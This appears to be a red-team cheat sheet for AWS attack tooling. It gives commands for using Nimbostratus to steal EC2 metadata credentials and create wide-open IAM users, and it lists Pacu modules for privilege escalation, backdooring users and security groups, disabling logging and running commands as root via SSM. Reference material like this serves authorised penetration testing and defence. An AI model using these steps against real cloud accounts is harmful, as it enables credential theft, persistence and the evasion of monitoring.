AWS Exploit

AWS Exploit#

Offensive tooling for AWS recon and post-exploitation. Nimbostratus abuses EC2 metadata; Pacu is the broad post-exploitation framework with modules for IAM enumeration, privesc, persistence, and bucket dumping.

Nimbostratus#

Install.

$ git clone git@github.com:andresriancho/nimbostratus.git
$ cd nimbostratus
$ pip install -r requirements.txt

Prerequisites are an AWS account, an access key, and Boto for Python 2.7.

Insert VULN_URL into the utils/mangle.py file, then run dump-metadata.

$ nimbostratus -v dump-ec2-metadata --mangle-function=core.utils.mangle.mangle

Enumerate metadata using the mangle function and retrieve any access key credentials found on the metadata server.

$ nimbostratus -v dump-credentials --mangle-function=core.utils.mangle.mangle

Dump all permissions for the provided credentials. Run right after dump-credentials.

$ nimbostratus dump-permissions --access-key=AKIA...PXXQ \
    --secret-key=...SUW --token=...JFE

Create a new user with a wide-open IAM policy.

$ nimbostratus -v create-iam-user --access-key ...UFUA \
    --secret-key ...DDxSZ --token ...tecaoI

Create an RDS snapshot.

$ nimbostratus -v snapshot-rds --access-key ...AUFUA --secret-key ...yDDxSZ \
    --token ...K2g2QU= --rds-name <DB_NAME> --password ********* --region us-west-2

Pacu#

Install.

$ git clone https://github.com/RhinoSecurityLabs/pacu
$ cd pacu
$ bash install.sh
$ python3 pacu.py

Starting Pacu. Set keys, list modules, run a module.

$ python3 pacu.py
> set_keys
> ls
> run <module_name> [--keyword-arguments]

Pacu modules#

  • iam__enum_assume_role, enumerate roles in other accounts for misconfigured trust.

  • iam__enum_users, enumerate IAM users in a separate account.

  • s3__bucket_finder, enumerate / brute-force S3 buckets.

  • aws__enum_account, data about the account itself.

  • aws__enum_spend, account spend by service.

  • codebuild__enum, CodeBuild builds and projects, looking for sensitive data.

  • ebs__enum_volumes_snapshots, EBS volumes and snapshots, flagging any without encryption.

  • ec2__check_termination_protection, list EC2 without termination protection.

  • ec2__download_userdata, downloads User Data from EC2 instances.

  • ec2__enum, broad EC2 enumeration.

  • glue__enum, Glue connections, crawlers, databases, endpoints, jobs.

  • iam__enum_permissions, confirmed permissions list for current or all users.

  • iam__enum_users_roles_policies_groups, users, roles, customer-managed policies, groups.

  • iam__get_credential_report, generate and download IAM credential report.

  • inspector__get_reports, vulnerabilities found by Inspector.

  • lambda__enum, AWS Lambda data.

  • lightsail__enum, Lightsail data.

  • iam__privesc_scan, IAM privilege-escalation path finder. Has trouble parsing NotActions.

  • cloudtrail__csv_injection, inject malicious formulas into CloudTrail event history.

  • vpc__enum_lateral_movement, network-plane lateral movement opportunities.

  • api_gateway__create_api_keys, create API Gateway keys for defined REST APIs.

  • ebs__explore_snapshots, restore and attach EBS snapshots to an instance of your choice.

  • ec2__startup_shell_script, stop and restart EC2 instances to execute code.

  • lightsail__download_ssh_keys, downloads default SSH key pairs.

  • lightsail__generate_ssh_keys, create SSH keys per region.

  • lightsail__generate_temp_access, temporary SSH keys for available instances.

  • systemsmanager__rce_ec2, execute as root / SYSTEM on EC2 via SSM. Linux runs in default shell, Windows in PowerShell. Can delay up to 15 minutes.

  • ec2__backdoor_ec2_sec_groups, add backdoor rules to security groups.

  • iam__backdoor_assume_role, create assume-role trust between users and roles.

  • iam__backdoor_users_keys, add API keys to other users.

  • iam__backdoor_users_password, add passwords to users without one.

  • s3__download_bucket, enumerate and dump files from S3 buckets.

  • cloudtrail__download_event_history, download CloudTrail event history to JSON. About 10000 events per 5 minutes.

  • cloudwatch__download_logs, capture CloudWatch logs to session downloads.

  • detection__disruption, disable, delete, or minimize logging / monitoring.

  • detection__enum_services, detect monitoring and logging.

  • elb__enum_logging, list ELBs without access logging, write the list with logging disabled to session downloads.

  • guardduty__whitelist_ip, add an IP to trusted IPs in GuardDuty. Only one trusted-IP list is allowed per detector; using this may replace an existing list with unintended consequences.

  • waf__enum, WAF rules and rule groups.

References#